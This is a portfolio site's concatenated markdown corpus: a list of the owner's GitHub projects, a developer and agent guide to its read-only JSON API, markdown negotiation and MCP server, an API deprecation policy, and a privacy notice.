| [CodeBounty](https://github.com/andrewcampi/CodeBounty) | A job hunting web app. | Python |
| [maze-escape](https://github.com/andrewcampi/maze-escape) | No description published. | Java |
| [maze-game](https://github.com/andrewcampi/maze-game) | CS 360 final project. | Java |
| [Stegosaurus](https://github.com/andrewcampi/Stegosaurus) | No description published. | — |
| [Maze-Pathfinding](https://github.com/andrewcampi/Maze-Pathfinding) | No description published. | Python |
| [Guess-That-Song-Challenge](https://github.com/andrewcampi/Guess-That-Song-Challenge) | No description published. | Python |
| [Type-Bot-Project](https://github.com/andrewcampi/Type-Bot-Project) | No description published. | Python |
| [Checkout-Simulation](https://github.com/andrewcampi/Checkout-Simulation) | No description published. | Python |

---

<!-- FILE: developers.md -->

# Andrew Campi developer resources

This is the developer and agent guide for andrewcampi.com. The site is Andrew Campi's portfolio. It is free to read. There is no API key, no signup, no sandbox tenant, and no paid tier. The only scope is `portfolio:read`, and every caller already has it. Do not send an `Authorization` header. A token will not be issued.

`robots.txt` allows GPTBot, ClaudeBot, ChatGPT-User, PerplexityBot, Google-Extended, and Applebot-Extended, along with every other user agent. A challenge page in front of the host can still stop a crawler before it reads that file. The published intent of this site is that those agents may fetch the public pages.

## When to use this

Use these URLs when you need Andrew Campi's current role, the Fiserv dates, or a factual summary of a project written up here (System 1 Server, Cecropia, Vessel, VulnMap, and the rest of the sidebar). Do not use them for Comft or Fiserv product support, account access, or anything that was never published on this domain.

## Markdown negotiation

Every documentation URL supports content negotiation on `GET`.

```bash
curl -sS -D - -o /dev/null -H 'Accept: text/markdown' https://andrewcampi.com/
curl -sS -D - -o /dev/null -H 'Accept: text/html' https://andrewcampi.com/
```

`Accept: text/markdown` returns a nonempty markdown body with `Content-Type: text/markdown; charset=utf-8` and `Vary: Accept`. `Accept: text/html` returns the HTML page, also with `Vary: Accept`. The homepage markdown is the introduction. A project such as `https://andrewcampi.com/cecropia.html` returns `wiki/cecropia.md` under the same rule. You can also fetch the files directly:

- Index for agents: [https://andrewcampi.com/llms.txt](https://andrewcampi.com/llms.txt)
- Full corpus: [https://andrewcampi.com/llms-full.txt](https://andrewcampi.com/llms-full.txt)
- Raw pages: `https://andrewcampi.com/wiki/<slug>.md`

`llms.txt` follows the usual shape: an H1, a short blockquote, a "When to use this" section, then links. `llms-full.txt` is every page concatenated in sidebar order.

## JSON API

The API is read-only JSON. The OpenAPI document is [https://andrewcampi.com/openapi.json](https://andrewcampi.com/openapi.json). Protected-resource metadata, including `scopes_supported: ["portfolio:read"]`, is at [https://andrewcampi.com/.well-known/oauth-protected-resource](https://andrewcampi.com/.well-known/oauth-protected-resource). That file does not point at an authorization server. There isn't one.

| Method | Path | operationId | Returns |
| --- | --- | --- | --- |
| GET | `/api/v1` | `getApiDirectory` | Endpoint list and the public-scope note |
| GET | `/api/v1/profile` | `getProfile` | Name, role, location, education, experience |
| GET | `/api/v1/experience` | `getExperience` | The experience array only |
| GET | `/api/v1/projects` | `listProjects` | Project summaries |
| GET | `/api/v1/projects/{slug}` | `getProject` | One project |

```bash
curl -sS https://andrewcampi.com/api/v1/profile
```

Errors are JSON, including 404, 405, and 429:

```json
{
  "error": {
    "code": "not_found",
    "message": "No project named 'missing'.",
    "hint": "GET /api/v1/projects lists every public project slug."
  }
}
```

Successful responses send `RateLimit-Limit`, `RateLimit-Remaining`, and `RateLimit-Reset`. The limit is 120 requests per minute per client IP, counted separately from the MCP endpoint. A 429 also sends `Retry-After` (seconds) and uses the error code `rate_limited`. Wait that many seconds and retry the same GET. `POST` is rejected with `method_not_allowed`.

Comft's current role is present in the experience array with an empty `highlights` list. That is intentional. There is no public description of the job yet. Fiserv's `end` is `2026-06`.

## Versioning and deprecation

The version is the path prefix `/api/v1`. How a later version would be retired, including when a response would carry `Deprecation` and `Sunset` headers, is written in [Andrew Campi API versioning and deprecation policy](https://andrewcampi.com/wiki/api-versioning.md). `/api/v1` is the current version, so those headers are not sent today. Every API response links to that policy with `Link: <https://andrewcampi.com/api-versioning.html>; rel="describedby"`.

## Missing pages

A URL that is not a published page, static file, or API route returns HTTP 404. It does not return the homepage. Send `Accept: text/markdown` and the body is a short markdown explanation that points at [llms.txt](https://andrewcampi.com/llms.txt), this guide, and [sitemap.xml](https://andrewcampi.com/sitemap.xml). The same pages are also served at extensionless paths: `/developers`, `/docs`, `/about`, `/contact`, `/privacy`, and `/api-versioning`.

## MCP

A read-only [Model Context Protocol](https://modelcontextprotocol.io) server is at `https://andrewcampi.com/mcp`. The transport is Streamable HTTP. `POST` a JSON-RPC 2.0 body. `GET` returns 405 because this server does not open an SSE side channel. `DELETE` ends a session with 204. After `initialize`, the response includes an `Mcp-Session-Id` header. Later calls may send it back. Calls without it still work.

The discovery files are:

- [https://andrewcampi.com/.well-known/mcp/manifest.json](https://andrewcampi.com/.well-known/mcp/manifest.json)
- [https://andrewcampi.com/.well-known/ai-catalog.json](https://andrewcampi.com/.well-known/ai-catalog.json)

Tools:

- `get_profile` reads the same object as `GET /api/v1/profile`.
- `list_projects` reads the project list.
- `get_page` takes `{ "slug": "cecropia" }` and returns that page's markdown. Slugs match the HTML file names (`work-experience`, `system1-server`, and so on).

Each tool is marked read-only. None of them change the site.

## What this site does not publish

There is no official portfolio CLI on npm, PyPI, or Homebrew. Natural and Otto are separate projects, not clients for this domain. There is no OAuth authorization server, no API key screen, and no trial signup. The sitemap of the HTML pages is [https://andrewcampi.com/sitemap.xml](https://andrewcampi.com/sitemap.xml).

---

<!-- FILE: api-versioning.md -->

# Andrew Campi API versioning and deprecation policy

The portfolio API is versioned in the URL path. The current version is `/api/v1`. This page is the deprecation policy agents can rely on. Every API response points here with `Link: <https://andrewcampi.com/api-versioning.html>; rel="describedby"`.

## Current version

`/api/v1` is the supported version. It is not deprecated. Responses do not include a `Deprecation` header or a `Sunset` header, because no removal date has been set. Adding a field to a JSON object is not a breaking change. Removing a field, renaming a field, or changing the meaning of a status code is a breaking change, and that kind of change will be published as `/api/v2` rather than edited into `/api/v1`.

The machine-readable contract for the current version is the [OpenAPI specification](https://andrewcampi.com/openapi.json). The guide that lists the operations is [Andrew Campi developer resources](https://andrewcampi.com/developers.html).

## How a version is retired

When a version is scheduled for removal, both of the following happen at least six months before the last day it will respond:

- This page names the version, the replacement URL, and the last day.
- Responses from that version include `Deprecation: true` and a `Sunset` header. The `Sunset` value is the HTTP-date of that last day, as defined by RFC 8594.

Until this page names a sunset date, keep calling `/api/v1`. No version of this API is deprecated today.

---

<!-- FILE: privacy.md -->

# Privacy

This is the privacy notice for andrewcampi.com, the personal portfolio of Andrew Campi. The site is a set of static documents generated from markdown and hosted on Cloudflare Pages. It does not have accounts, payments, newsletters, or a contact form.

The pages you read are the same words an agent receives. A normal browser request gets HTML. A request that prefers `text/markdown` gets the markdown source. A call to `/api/v1` or the MCP endpoint at `/mcp` gets JSON. Those interfaces are public and read-only. They do not ask for your name, and they do not accept a secret. The scope name `portfolio:read` means "this is already public." Sending no token is the correct call.

The site does not run a third-party analytics pixel and it does not sell data. Cloudflare, the host, processes the request the way any CDN does, including the IP address and user agent in its ordinary logs. This site does not copy those logs into a separate database that Andrew operates.

Two browser features are optional and stay on your machine. The theme button stores the word `light` or `dark` in `localStorage` under the key `theme`. The search box filters a static JSON file that shipped with the page. The query is not sent to a server. If JavaScript is off, the articles are still in the HTML, the sidebar is still in the page, and nothing is written to storage.

Project pages link out to GitHub, LinkedIn, and a few other sites Andrew has published. Those sites have their own notices. This page does not cover Comft or Fiserv. They appear here only as employers.

If a sentence on this site is wrong, the correction path is the [contact](https://andrewcampi.com/wiki/contact.md) page: GitHub or LinkedIn. There is no email address on the domain to use instead.

---

